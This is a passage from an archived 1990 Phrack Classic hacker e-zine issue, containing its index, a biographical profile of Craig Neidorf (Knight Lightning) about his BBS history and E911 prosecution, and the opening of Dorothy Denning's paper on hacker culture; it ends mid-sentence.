home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / phrack / phrack32.arj / PHRACK32.TXT
Text File  |  1980-01-01  |  344KB  |  7,451 lines

  1.  
  2.  
  3.                               ==Phrack Classic==
  4.  
  5.                      Volume Three, Issue 32, File #1 of XX
  6.  
  7.                   Phrack Classic Newsletter Issue XXXII Index
  8.                   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  9.  
  10.                                November 17, 1990
  11.  
  12.   Over the past year we have seen MANY changes in the Phreak/Hack community.
  13. We felt the heat of Operation Sun Devil, watched are friends become public
  14. scapegoats of the 'hacker world', and watched in anger as the lawyers have
  15. tried to smash us and put us out like an old cigarette.  Almost everyday I
  16. hear about someone who just got 'busted' for one reason or another.  This
  17. makes me sit back and think.  If people go to jail for hacking, and hackers
  18. know this, then why does it continue?  Ahhh... an unsolved mystery.  Maybe I
  19. should call Time Life Books.  No, I don't think so.
  20.   Anyways, I am pleased to announce a new era in electronic publications.  A
  21. new age for a new age.  Ladies and gentleman (Trumpet Fanfare Added Here),
  22. Phrack Classic.  Phrack Classic takes off where Phrack left off.  For those
  23. of you who have read Phrack then you might remember me as the editor for a
  24. while.  Well, now I am doing Phrack Classic to try to release a newsletter
  25. that really describes what the Phreak/Hack world is like here in the 1990's.
  26.   People ask me why I am writing a hacker magazine, and they look down on me
  27. for my attempt.  I feel Phrack Classic is written for hackers, yes, but I also
  28. feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
  29. discovering knowledge, inventing solutions, <and> adventuring into uncharted
  30. areas."  So is it so wrong to publish a newsletter for the exchange of free
  31. information?  No, I don't think so.
  32.   Anyone is welcome to submit an article for Phrack  Classic, and I encourage
  33. everyone to do so.  I hope you enjoy this issue and I look forward to bringing
  34. you many more in the not so distant future.  Stay safe and be free.  See you
  35. at Ho Ho Con!
  36.  
  37.  
  38.                                                     Crimson Death
  39.                                                     Editor of Phrack Classic
  40.  
  41.  
  42. (Quote taken from the Hackers 6.0 Conference Brochure)
  43.  
  44.  
  45. If you have a question, an article submission, or you just wanna say
  46. hello. Send mail to Crimson Death and Doc Holiday at:
  47.  
  48.  
  49.                                pc@well.sf.ca.us
  50. _______________________________________________________________________________
  51.  
  52.  
  53.                               Table of Contents:
  54.  
  55.   1.  Phrack Classic XXXII Index by Crimson Death
  56.   2.  Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
  57.   3.  Concerning Hackers Who Break Into Computer Systems by Dorthy Denning
  58.   4.  The Art of Investigation by Butler
  59.   5.  Unix 'Nasties' by Sir Hackalot
  60.   6.  Automatic Teller Machine Cards by Jester Sluggo
  61.   7.  A Trip to the NCSC by Knight Lightning
  62.   8.  Inside the SYSUAF.DAT File by Pain Hertz
  63.   9.  RSTS by Crimson Death
  64.   10-12.  Knight Line I/Parts 1-3 by Doc Holiday
  65. _______________________________________________________________________________
  66.  
  67.                               ==Phrack Classic==
  68.  
  69.                      Volume Three, Issue 32, File #2 of 12
  70.  
  71.  
  72.                          ==Phrack Classic Spotlight==
  73.  
  74.                                Knight Lightning
  75.                                ~~~~~~~~~~~~~~~~
  76.  
  77. Personal
  78. ~~~~~~~~
  79.              Handle:  Knight Lightning
  80.            Call him:  Craig Neidorf
  81.        Past handles:  None
  82.       Handle origin:  Cross between character "Lightning Lad" from DC Comics'
  83.                       Legion of Superheros and Michael Knight from the NBC
  84.                       television series "Knight Rider".
  85.       Date of Birth:  I doubt you're sending me a birthday card so skip it.
  86. Age at current date:  21 years old
  87.              Height:  5'10" or so (give or take an inch)
  88.              Weight:  135-140 lbs.
  89.           Eye color:  Brown
  90.          Hair Color:  Dark Brown
  91.           Computers:  Apple IIc (Do you believe this?)
  92.         Co-Sysop of:  Metal Shop Private, The Brewery, Quick Shop/Metal Shop
  93.                       AE, Whackoland, The Dark Tower, Digital ITS (yay!),
  94.                       Stronghold East and probably a few more I've forgotten
  95.                       about.
  96.         Net address:  C483307@UMCVMB.MISSOURI.EDU (Yes, they actually gave
  97.                       C483307@UMCVMB.BITNET        me my account back!)
  98.                       knight@well.sf.ca.us
  99.  
  100. ------------------------------------------------------------------------------
  101.       For several years I had been a die hard fan of video games, both arcade
  102. and home versions.  It was really the Atari 2600 video game Adventure that led
  103. me into the world of computers and hacking.  As many people might know there
  104. was a secret locked within this game concerning a "magic" dot.  It was not
  105. mentioned in any instruction manuals for the game, but if you could find it and
  106. bring it to the right place in the game, you could enter a room that didn't
  107. officially exist.  In this room was a message flashing in gold and black.  It
  108. said "Created by Warren Robinet".  From that point on I experimented with every
  109. Atari cartridge I had.  I tried screwing around with the connections, the
  110. components on the system itself, and I attempted bizarre tactics within the
  111. games, just to see what might happen.  During that period of time I found
  112. several more secretly implanted messages and developed new ways of playing the
  113. games.  Atari played on this idea quite a bit when they created a four game
  114. saga called Swordquest, but by then the fun was taken out of it because you
  115. knew already that something was waiting to be found.  Eventually I upgraded to
  116. ColecoVision, but before too long this bored me as well.  It is sort of
  117. interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
  118. It makes me wonder if this cycle is permanent.
  119.      I was first introduced to the world of computers by a friend who had a
  120. Commodore 64.  He showed me what bulletin boards were and then took me on a
  121. tour of the ARPAnet.  Later that year, my long-time and best friend, known to
  122. most of you as Taran King obtained the use of his father's IBM PC.  Together we
  123. explored various bulletin boards in the St. Louis area, always looking for new
  124. places to visit.
  125.      In August of 1983 I received an Apple IIc as a birthday gift from my
  126. parents.  It was real basic -- no monitor (I had a black and white television
  127. for that), no extra disk drive, no printer, no joystick, and no modem.  Those
  128. items I would have to earn.  So instead of playing with faraway computer
  129. systems, I was introduced to programming and a community of people who
  130. considered themselves to be software pirates.  These people seemed to be able
  131. to get software before the companies even began to sell it.  However, I was
  132. content to play games like Ultima III and Wizardry and hack the game itself by
  133. altering character values.  This enabled me to move my characters through
  134. different places, some of which I never might have realized existed.  Later, I
  135. was able to redesign the game itself to create an endless world of new
  136. possibilities for intellectual stimulation.
  137.      Finally in March of 1984, my parents purchased me a modem.  It was a sad
  138. little piece of plastic made by Volksmodem, 300 baud and battery operated, but
  139. it worked and now Knight Lightning was ready to take to the wires.  By this
  140. time I already knew a lot about the bulletin board community through Taran
  141. King.  Even so, it was relatively odd how fast I became co-sysop of the
  142. ancestor to Metal Shop known as The Dark Tower.  TDT was operated by a "hacker"
  143. with the truly unoriginal name of David Lightman.  Before I knew it, I was in
  144. remote command of his system with full power over user validation and BBS
  145. maintenance.  Although the system went down after about six months, it did
  146. attract a few out of state users and it was here that my notoriety began.  It
  147. was almost funny, but even as early as then Taran King, Forest Ranger, and I
  148. became known as the top hacker/phreakers in the St. Louis area.  To this day I
  149. still don't understand why.
  150.      By July of 1985 most of the hacker bulletin boards in St. Louis had
  151. disappeared, but The Dark Tower program lived again when Taran King created
  152. Metal Shop:  The Dark Tower Phase II.  He took the name from a popular
  153. afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
  154. Both of us had visited systems around the country and we were able to
  155. effectively advertise MS.  At one point we had over 500 registered users so we
  156. switched to a general password system for security reasons and eventually in
  157. January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
  158. users.
  159.      During the late Spring and early Summer of 1985 Taran King and I created
  160. the 2600 Club.  It was just a group name to stick behind our handles since
  161. everybody was doing it, but it only took use a few months to realize just
  162. how ignorant hacker groups really are.  However, the 2600 Club had one
  163. great legacy -- it gave birth to Phrack.  If you go back and look, you'll
  164. notice that the first issue of Phrack was a product of the 2600 Club.  The idea
  165. for doing Phrack came from Forest Ranger.  Taran King provided the arena and
  166. would be the editor and I came up with the name.
  167.      When I used to call bulletin boards like the Twilight Zone (sysoped by The
  168. Marauder) I would data capture the message bases and save them in text files.
  169. The messages from the hacking subboard would be saved in a file called HACKMESS
  170. (which stood for hack messages), the messages from the phone phreak subboard
  171. were saved as PHREAKMESS, but when there was a subboard where both these types
  172. of messages appeared together, I simply merged the two names and came up with
  173. PHRACKMESS.  Since the newsletter would contain information on both topics and
  174. more, I felt the name Phrack was applicable.  So where did the "Inc." come
  175. from?  Actually it came from another DC Comics series called Infinity Inc.
  176. Kind of silly now since we never intended to actually incorporate.  The first
  177. issue of Phrack was distributed on November 17, 1985.
  178.      In Phrack issue 2 I began the ongoing series of Phrack World News.  I
  179. followed every story I could and it was fun.  The first issue was sort of lame,
  180. but eventually I learned that PWN was the most popular segment of Phrack.  The
  181. greatest thing about PWN was that it was an original concept for a hacker
  182. newsletter -- lots of people had tried to write "how-to files, but no one had
  183. ever tried news before.  Who was getting busted?  What did they do?  How can I
  184. make sure it doesn't happen to me?  Lots of the stories were exaggerated or in
  185. the case of Oryan QUEST, fabricated (by QUEST himself).
  186.      Outside of Phrack World News I wrote files about Videoconferencing,
  187. Private Branch eXchanges, and a few others here and there.  Prior to Phrack
  188. I had released a huge glossary of telecommunications terms and files about the
  189. divestiture of AT&T and its aftermath.  Taran King and I also wrote a joke file
  190. about "Real Phreaks" that was echoed by a continuation of that file in the
  191. Phrack parody issue number 13 that was released on April 1, 1987.
  192.      Throughout my years I have met many people who call themselves hackers
  193. and/or phone phreaks:
  194.  
  195. Android Pope       - I wonder how married life is treating him.
  196. Aristotle          - Sporty!  He is the former editor of the New TAP.
  197. Bad Subscript      - Right hand man to Control C and an expert at disco dancing
  198.                      in high speed Camaros.
  199. Bill from RNOC     - How have your phone bills been?  High?  Have they been!?
  200.                      He is also known as "the most dangerous man in New York."
  201. Beer Wolf          - Former sysop of the (Metal Shop) Brewery.
  202. Blue Buccaneer     - Lost track of him over the years.
  203. Cat Man            - How about a nice Hawaiian Punch?
  204. Cheap Shades       - Now a Computer Science graduate of University of
  205.                      Missouri-Rolla.  Former sysop of Metal Shop AE and
  206.                      QuickShop.
  207. Control C          - A man with serious problems right now.  Hope you get those
  208.                      videotapes and best of luck!
  209. Crimson Death      - The one in 618 NPA.  Very un-original name, but definitely
  210.                      one of a kind.
  211. Cryptic Fist       - Kinda warm for that leather jacket, isn't it? (90 degrees)
  212. Cutthroat          - So what McDonalds do *you* work at?
  213. Dan The Operator   - An informant for John Maxfield (SummerCon '87).
  214. Data Line          - Now a government agent, but hardly a hacker tracker.
  215. David Lightman     - The sysop of The Dark Tower in 314 NPA.
  216. The Dictator       - Not-so secret agent of Gail Thackeray, the assistant
  217.                      Arizona state attorney behind Operation Sun-Devil.
  218.                      In a past life, Dale was the creator of Candid Camera.
  219.                      What a surprise that was this summer.
  220. Disk Jockey        - I thought he was a great guy until he started to backstab
  221.                      me on Lunitic Labs while I was under indictment.
  222. Doc Holiday (901)  - The original!
  223. Dr. Cypher         - Knowledgeable person who remains local.
  224. Dr. Forbin         - Last seen at SummerCon '89.
  225. Dr. Ripco          - Well haven't met him yet, but in a couple of weeks.
  226. Doom Prophet       - A friend who seems to have disappeared.
  227. Epsilon            - Must have lost my number I guess.
  228. Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
  229. Erik Bloodaxe      - He is a wildcard... totally unpredictable... hacks by the
  230.                      seat of his pants.  Still active, but he'd better not have
  231.                      a squirt gun next to his bed or he may be sorry.{SS}
  232. Forest Ranger      - The man who introduced me to the hacker elite way back
  233.                      when.  Former editor of TeleComputist Newsletter.
  234. Gary Seven         - Don't remember much about him.  Met him with Lex in Fla.
  235. Hatchet Molly      - You know him as Computer Underground Digest's Gordon
  236.                      Meyer.  He used a hacker alias to better enable him to
  237.                      write his famous thesis.
  238. Jester Sluggo      - A mystery man who is still a legend in the Zantigo
  239.                      restroom and a better than average drunk driver.
  240. Kleptic Wizard     - Was he BJ or the Bear?
  241. Lex Luthor         - One time great legend of LOD, now secret BellSouth
  242.                      Security (at least until I hear otherwise).
  243. The Leftist        - I wonder what he was going to say about me at my trial.
  244.                      He gave me a nod the day they dropped the charges against
  245.                      me.  The US Attorney's office tells me that he was going
  246.                      to claim he learned all he knew about hacking from reading
  247.                      Phrack.
  248. Loki               - Lost track of him over the years.
  249. Lucifer 666        - Lights, Camera, Action!
  250. The Mad Hacker     - Sysop of The Private Connection in 219 NPA.
  251. Mad Hatter         - Still don't know what to make of him, but I wonder if he
  252.                      still thinks table salt and baking soda are cocaine.
  253. The Mentor         - Author of GURPS CyberPunk and former sysop of The Phoenix
  254.                      Project bulletin board.
  255. The Noid           - Important enough for Southwestern Bell to question me
  256.                      about him so important enough to be mentioned here.
  257. Par                - Hans.
  258. Phantom Phreaker   - A friend.
  259. Phil Phree         - Sort of spaced out character and right hand man to The
  260.                      Ur-vile.
  261. Phrozen Ghost      - Lost track of him.
  262. Predat0r           - Anarchistic editor of the New TAP.
  263. The Prophet        - Didn't actually "meet" him, but I did see him and hear him
  264.                      speak... as a witness for the prosecution at my trial.  I
  265.                      don't hold a grudge.  His testimony helped clear me.
  266. Rabbit             - Franz.
  267. The Renegade       - Thinks he is part of the Illuminati.
  268. Reverend Enge      - Not that religious.
  269. Sir Francis Drake  - A great guy with an odd taste in jewelry.  The editor of
  270.                      the now defunct WORM.  Duck!
  271. Sir William        - Never did hear the whole story of his problems with the
  272.                      University of Michigan computing staff.
  273. Surfer Bob         - Lost track of him, but he enjoyed a tan at SummerCon'88.
  274. Synthetic Slug     - Surfs up!
  275. Taran King         - My best friend of over 11 years.
  276. TWCB Inc.          - Two brothers who attempted to resurrect TAP, but failed.
  277. Tuc                - Hey!  He's TUC!
  278. The Ur-Vile        - Don't know how I feel about him.  He needs a real handle.
  279.  
  280.      Some of the memorable bulletin boards I was on include:
  281.  
  282. Alliance              - By Phantom Phreaker
  283. Brainstorm Elite      - Where I met Phantom Phreaker and recruited him to Metal
  284.                         Shop Private.
  285. Broadway Show         - By Broadway Hacker.  Changed its name to The Radio
  286.                         Station.
  287. Catch-22              - By Silver Spy.  Only 22 users on this system.
  288. Chamas                - By Terra (Chaos Computer Club) in Germany.
  289. Dark Tower            - By David Lightman 314
  290. Digital ITS           - By Oryan QUEST.  BBS Commands were in Spanish.
  291. DUNE                  - Secret system imbedded on the Dartmouth University
  292.                         mainframe operated remotely by Apollo Phoebus.
  293. Flying Circus         - By Monty Python
  294. FreeWorld II          - By Major Havoc
  295. Hell Phrozen Over     - By the original Crimson Death.  Inspiration for the
  296.                         first Phrack Pro-Phile.
  297. Intergalactic Dismantling, Inc. - By Aiken Drum
  298. Lost City of Atlantis - By The Lineman
  299. Lunatic Labs UnLtd.   - By The Mad Alchemist.  Great system!
  300. Matrix                - By Dr. Stangelove
  301. Metal Shop AE         - By Cheap Shades when he lived in St. Louis, Missouri.
  302. Metal Shop Brewery    - By Beer Wolf who now denies that it ever happened.
  303. Metal Shop Private    - Greatest bulletin board of all time.
  304. MetroMedia            - By Dr. Doom.  System became Danger Zone Private.
  305. NetSys                - By Terminus.  NetSys is now in possession of US Secret
  306.                         Service and Terminus' life is in a shambles.  They set
  307.                         him up and shut him down.  You know him as Len Rose.
  308. Pearly Gates          - First real out of state bulletin board that I called.
  309.                         It had a secret section of the board for all of the
  310.                         really good information.  It was operated by Simon
  311.                         Templar.
  312. Phoenix Project       - By The Mentor.  Great center of learning.
  313. Phreak Klass 2600     - By The Egyptian Lover.  Preceded The Phoenix Project as
  314.                         a great center of learning.
  315. Pipeline              - Another early bbs I visited.
  316. Pirate-80             - A codes board run by Scan Man that has been up for
  317.                         almost 10 years.  This system was NOT a target in
  318.                         Operation Sun-Devil.  Odd?
  319. Private Connection    - By The Mad Hacker
  320. Private Sector        - Legendary system.
  321. QuickShop             - By Cheap Shades when he lived in Rolla, Missouri.
  322. RACS III              - By Tuc
  323. Radio Station         - See The Broadway Show.
  324. Ripco                 - By Dr. Ripco - Shut down in Operation Sun-Devil, but
  325.                         its back up now.
  326. Septic Tank           - By The Safecracker.  Second generation of The Twilight
  327.                         Zone.
  328. ShadowSpawn           - By Psychic Warlord.  Great debate about the use of
  329.                         handles and real name/telephone/etc.  "We're Not
  330.                         *ELITE*, We're Just Cool As Hell!"  Taran King thought
  331.                         they were elite in the negative sense of the word.
  332.                         Great system though.
  333. Speed Demon Elite     - By The Radical Rocker and home base to MetaliBashers,
  334.                         Inc.
  335. Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
  336.                         run from the home of The Equalizer.
  337. Twilight Zone         - By The Marauder.  Great system for knowledge from my
  338.                         early days.
  339. Zyolog                - By Byte Rider in Hawaii.
  340.  
  341.      There are probably a few others that I have forgotten to mention.  My
  342. greatest computer learning experiences came from people like Bill From RNOC,
  343. RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
  344. Phrack files and other technical journals.
  345.      In general I see computers as the communications medium of the 21st
  346. Century so I devoted a lot of time to mastering their use.  I do not advocate
  347. the illegal breaking in to computer systems, but there are certain types of
  348. information that I feel should be available to everyone equally and not just
  349. the rich or the well connected.
  350.      Through my experiences on the Internet, I have had legitimate access to
  351. IBM VM/CMS, Unix, and VAX/VMS systems.  For the most part I am content with my
  352. VM/CMS account, but will accept invitations from system managers to join their
  353. systems as well.
  354.      With Forest Ranger and Taran King, I organized and attended SummerCon '87,
  355. SummerCon '88, and SummerCon '89.  I did not attend SummerCon '90 since I was
  356. in Chicago at the time.  I helped in organizing and attended PartyCon '87 and
  357. most recently I appeared and spoke at the 13th Annual National Computer
  358. Security Conference in Washington D.C.
  359.      I had been a part of TeleComputist Newsletter, which inadvertently led to
  360. my first real media appearance (Detroit Free Press) and prior to that I was
  361. helping TWCB Inc. to create a NEW TAP.  However, when I learned that they were
  362. just pulling a fraud, I exposed them.  For 5 years I devoted myself to Phrack
  363. with absolutely no compensation save knowledge and experiences gained.
  364.  
  365. ===============================================================================
  366.  
  367.      Interests:  Racquetball (varsity team in high school and a bookshelf full
  368.                  of trophies), Telecommunications, Computers, Music (classic
  369.                  rock and pop music... NO RAP!), Fraternity life (well at least
  370.                  up until the trustees suspended me for being indicted), Women
  371.                  (sexy and smart over just good looks any day), Driving at warp
  372.                  speed on the interstate.
  373.  
  374. Craig's Favorite Things
  375. -----------------------
  376.   Women: I've got it, but don't flaunt it.
  377.    Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
  378.   Foods: No Curry in a hurry-Blecch!  American, Italian, Mexican, and Chinese!
  379.   Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
  380. Leisure: Sleeping, working out, racquetball, writing, computing.
  381. Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
  382.  
  383. Most Memorable Experiences
  384. --------------------------
  385. All of the SummerCons, having an assistant U.S. Attorney lie to my face and
  386. tell me I wasn't in trouble five days after he went to the grand jury to have
  387. me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
  388. Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
  389. after I turned myself over to the U.S. Federal Marshalls (E911 Incident),
  390. Taran King and Cheap Shades out of jail when they were caught trashing,
  391. summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
  392. heard Frank & The Funny Phone Call, watching Control C bother some girl
  393. in the airport and then seeing Erik Bloodaxe fall in love with her.
  394.  
  395.  
  396. Some Other People To Mention
  397. ----------------------------
  398. Sheldon Zenner      - The greatest attorney practicing today.  He turned
  399.                       everything around and saved my future from a legal system
  400.                       gone awry.  Thanks also to Kliebard, Dunlop, Berkowitz,
  401.                       and Kaufman.
  402.  
  403. John Perry Barlow   - Lyricist for the Grateful Dead and amazing writer, John
  404.                       also participated a great deal in generating publicity
  405.                       about my case and helped found the Electronic Frontier
  406.                       Foundation.
  407. Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
  408.                       me to the 13th Annual National Computer Security
  409.                       Conference and is a good friend.
  410. Peter Denning       - Senior editor of the Communications of the ACM and an
  411.                       interesting fellow in his own right.
  412. Scott Ellentuch     - Mentioned earlier as Tuc, Scott is the president of the
  413.                       Telecom Computer Security Group and a close friend.  Tuc
  414.                       assisted the defense team by locating the Bellcore public
  415.                       catalog and the 911 documents found within.  Thanks Tuc!
  416. Terry Gross         - Attorney with Rabinowitz & Boundin in New York City who
  417.                       was hired by the EFF to work on court motions dealing
  418.                       with the First Amendment.
  419. Mike Godwin         - Don't know Mike very well yet, but he was very outspoken
  420.                       in Computer Underground Digest while I was under
  421.                       indictment and now he is in-house counsel to the
  422.                       Electronic Frontier Foundation.
  423. Katie Hafner        - Author of a book coming soon about Pengo, Kevin Mitnick,
  424.                       and Robert Morris, Jr.  I met Katie at the NCSConference.
  425. Steve Jackson       - Founder of Steve Jackson Games.  I haven't yet had the
  426.                       pleasure of meeting Steve, but we may be running into
  427.                       each other in the near future.
  428. Mitch Kapor         - Industry wizard and creator of the Lotus 1-2-3 program,
  429.                       Mitch is a founding member of the Electronic Frontier
  430.                       Foundation that provided legal assistance in my case.  I
  431.                       hope to meet him face-to-face in the near future.
  432. Gordon Meyer        - Gordon has been a tremendous help with Phrack and a
  433.                       friend throughout my entire trial ordeal.
  434. John Nagle          - Inventor who gave technical assistance to my defense team
  435.                       and located some very important public documents.
  436. Marc Rotenberg      - Director of the Computer Professionals For Social
  437.                       Responsibility in Washington D.C.  CPSR is an
  438.                       organization lobbying Congress for reforms in the
  439.                       Computer Fraud & Abuse Act and other legislation.  I hope
  440.                       to be working with him in the future.
  441. Jim Thomas          - Creator and editor of Computer Underground Digest, he
  442.                       brought the details and evidence in my trial to the
  443.                       public eye which helped me gain support.
  444. Steve Wozniak       - Never had any contact with him, but since he had a hand
  445.                       in EFF, I thought I would mention him.  Incidentally I'm
  446.                       ready to upgrade computers if someone has a Macintosh on
  447.                       hand.
  448.  
  449. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  450.  
  451. David Lightman   - The one in 214.  See Oryan QUEST.
  452. Magic Hasan      - Totally freaked out when I contacted him this semester.  It
  453.                    was like he thought I had the plague or something.
  454. Olorin The White - He couldn't seem to understand that I did not want to join
  455.                    his group.
  456. Oryan QUEST      - A hacker who made up news for PWN just to boost his
  457.                    reputation.  Unleash with full force on this!
  458. Sally Ride       - Also known as Space Cadet, SR co-wrote one of the most
  459.                    interesting PWN articles ever printed.
  460. ===============================================================================
  461.  
  462. Private Jokes
  463. ~~~~~~~~~~~~~
  464. There are far too many to go through and most of them have been previously
  465. written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
  466. My private jokes shall remain private between those involved or at least until
  467. I publish a book covering the topic.
  468.  
  469. ===============================================================================
  470.  
  471.      Phrack is a part of my life that is now over.  I hope that Phrack Classic
  472. which appears to be a second generation Phrack will learn from its predecessor
  473. and not allow any articles that advocate the illegal entry into computer
  474. systems.  On the other hand, I hope they will continue to bring interesting
  475. information and news to light every issue.
  476.      For the record, I am not the editor of Phrack Classic.  In fact I am not
  477. even a part of their staff.  I would ask that no one send me any articles for
  478. that publication because they will not be forwarded.  I take no responsibility
  479. for the actions taken by Phrack Classic, but I have faith that they shall stay
  480. on the path of honesty and integrity.
  481.      I also have a few words to say about some other issues.  My case and
  482. prosecution had absolutely nothing to do with Operation Sun-Devil, with a
  483. possible exception being the secret video-taping done by the United States
  484. Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
  485. July 22-24, 1988 (i.e., SummerCon '88).  Operation Sun-Devil was an attempt to
  486. crack down on credit card and calling card abusers and NOT hackers.  Yes, there
  487. are some hackers that abuse these items, but the mere abuse of such does not
  488. make someone a hacker and it is about time that mainstream reporters,
  489. government agents, and prosecutors began to understand the difference.
  490.      I feel that the abuse of "cards" is very immature and should be met with
  491. stern punishment.  I myself have been the victim of credit card fraud and I can
  492. tell you that it is not pleasant to open your bill and see expensive charges
  493. from QVC Home Shopping Network.  For the younger readers, it may take them a
  494. few years to understand this... perhaps when they have credit cards and bills
  495. of their own to deal with.
  496.      As you may guess there is MUCH MORE to my story especially concerning the
  497. last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
  498. the time or the place to tell it.  Sometime in the future I hope to assemble
  499. the tales of all my adventures in the computer underground and publish them in
  500. a real book.
  501.      Finally, Hackers are *NOT* criminals!  Quoting from the brochure for this
  502. year's Hackers Conference in Saratoga, California, a Hacker is "someone who
  503. enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
  504. solutions, <and> adventuring into uncharted areas."
  505.  
  506. :Craig Neidorf
  507.  
  508. ===============================================================================
  509.  
  510. ...And now for the regularly taken poll from all interviewees.
  511.  
  512.      Of the general population of phreaks you have met, would you consider most
  513. phreaks, if any, to be computer geeks?
  514.  
  515.      "I would not consider most of the hackers or phone phreaks I have met to
  516. be computer geeks, however over the years I have run into people whose goal in
  517. life is to pirate every piece of software in existence and of those people I
  518. feel that a strong percentage are 'geeks'."
  519.  
  520.      Thanks for your time, Craig.  "No problem."
  521.  
  522.                                             Crimson Death
  523. _______________________________________________________________________________
  524.  
  525.                               ==Phrack Classic==
  526.  
  527.                      Volume Three, Issue 32, File #3 of 12
  528.  
  529.               Concerning Hackers Who Break into Computer Systems
  530.  
  531.                               Dorothy E. Denning
  532.                Digital Equipment Corp., Systems Research Center
  533.                    130 Lytton Ave., Palo Alto, CA 94301
  534.                      415-853-2252, denning@src.dec.com
  535.  
  536.  
  537. Abstract
  538.  
  539. A diffuse group of people, often called ``hackers,'' has been
  540. characterized as unethical, irresponsible, and a serious danger to
  541. society for actions related to breaking into computer systems.  This
  542. paper attempts to construct a picture of hackers, their concerns,
  543. and the discourse in which hacking takes place.  My initial findings
  544. suggest that hackers are learners and explorers who want to help
  545. rather than cause damage, and who often have very high standards
  546. of behavior.  My findings also suggest that the discourse surrounding
  547. hacking belongs at the very least to the gray areas between larger
  548. conflicts that we are experiencing at every level of society and
  549. business in an information age where many are not computer literate.
  550. These conflicts are between the idea that information cannot be owned
  551. and the idea that it can, and between law enforcement and the First
  552. and Fourth Amendments.  Hackers have raised serious issues about
  553. values and practices in an information society.  Based on my findings,
  554. I recommend that we work closely with hackers, and suggest several
  555. actions that might be taken.
  556.  
  557.  
  558. 1.  Introduction
  559.  
  560. The world is crisscrossed with many different networks that are used
  561. to deliver essential services and basic necessities -- electric power,
  562. water, fuel, food, goods, to name a few.  These networks are all
  563. publicly accessible and hence vulnerable to attacks, and yet virtually
  564. no attacks or disruptions actually occur.
  565.  
  566. The world of computer networking seems to be an anomaly in the
  567. firmament of networks.  Stories about attacks, breakins, disruptions,
  568. theft of information, modification of files, and the like appear
  569. frequently in the newspapers.  A diffuse group called ``hackers''
  570. is often the target of scorn and blame for these actions.  Why are
  571. computer networks any different from other vulnerable public networks?
  572. Is the difference the result of growing pains in a young field?
  573. Or is it the reflection of deeper tensions in our emerging information
  574. society?
  575.  
  576. There are no easy or immediate answers to these questions.  Yet it
  577. is important to our future in a networked, information-dependent
  578. world that we come to grips with them.  I am deeply interested in
  579. them.  This paper is my report of what I have discovered in the early
  580. stages of what promises to be a longer investigation.  I have
  581. concentrated my attention in these early stages on the hackers
  582. themselves.  Who are they?  What do they say?  What motivates them?
  583. What are their values?  What do that have to say about public policies
  584. regarding information and computers?  What do they have to say about
  585. computer security?
  586.  
  587. From such a profile I expect to be able to construct a picture of
  588. the discourses in which hacking takes place.  By a discourse I mean
  589. the invisible background of assumptions that transcends individuals
  590. and governs our ways of thinking, speaking, and acting.  My initial
  591. findings lead me to conclude that this discourse belongs at the very
  592. least to the gray areas between larger conflicts that we are
  593. experiencing at every level of society and business, the conflict
  594. between the idea that information cannot be owned and the idea that
  595. it can, and the conflict between law enforcement and the First and
  596. Fourth Amendments.
  597.  
  598. But, enough of the philosophy.  On with the story!
  599.  
  600.  
  601. 2.  Opening Moves
  602.  
  603. In late fall of 1989, Frank Drake (not his real name), editor of
  604. the now defunct cyberpunk magazine W.O.R.M., invited me to be
  605. interviewed for the magazine.  In accepting the invitation, I hoped
  606. that something I might say would discourage hackers from breaking
  607. into systems.  I was also curious about the hacker culture.  This
  608. seemed like a good opportunity to learn about it.
  609.  
  610. The interview was conducted electronically.  I quickly discovered
  611. that I had much more to learn from Drake's questions than to teach.
  612. For example, he asked: ``Is providing computer security for large
  613. databases that collect information on us a real service?  How do
  614. you balance the individual's privacy vs. the corporations?''  This
  615. question surprised me.  Nothing that I had read about hackers ever
  616. suggested that they might care about privacy.  He also asked: ``What
  617. has (the DES) taught us about what the government's (especially NSA's)
  618. role in cryptography should be?''  Again, I was surprised to discover
  619. a concern for the role of the government in computer security.  I
  620. did not know at the time that I would later discover considerable
  621. overlap in the issues discussed by hackers and those of other computer
  622. professionals.
  623.  
  624. I met with Drake to discuss his questions and views.  After our
  625. meeting, we continued our dialog electronically with me interviewing
  626. him.  This gave me the opportunity to explore his views in greater
  627. depth.  Both interviews appear in ``Computers Under Attack,''
  628. edited by Peter Denning (DenningP90).
  629.  
  630. My dialog with Drake increased my curiosity about hackers.  I read
  631. articles and books by or about hackers.  In addition, I had discussions
  632. with nine hackers whom I will not mention by name.  Their ages ranged
  633. from 17 to 28.
  634.  
  635. The word ``hacker'' has taken on many different meanings ranging
  636. from 1) ``a person who enjoys learning the details of computer systems
  637. and how to stretch their capabilities'' to 2) ``a malicious or
  638. inquisitive meddler who tries to discover information by poking around
  639. ... possibly by deceptive or illegal means ...'' (Steele83).  The
  640. hackers described in this paper are both learners and explorers who
  641. sometimes perform illegal actions.  However, all of the hackers I
  642. spoke with said they did not engage in or approve of malicious acts
  643. that damage systems or files.  Thus, this paper is not about malicious
  644. hackers.  Indeed, my research so far suggests that there are very
  645. few malicious hackers.   Neither is this paper about career criminals
  646. who, for example, defraud businesses, or about people who use stolen
  647. credit cards to purchase goods.  The characteristics of many of the
  648. hackers I am writing about are summed up in the words of one of the
  649. hackers: ``A hacker is someone who experiments with systems...
  650. (Hacking) is playing with systems and making them do what they were
  651. never intended to do.  Breaking in and making free calls is just
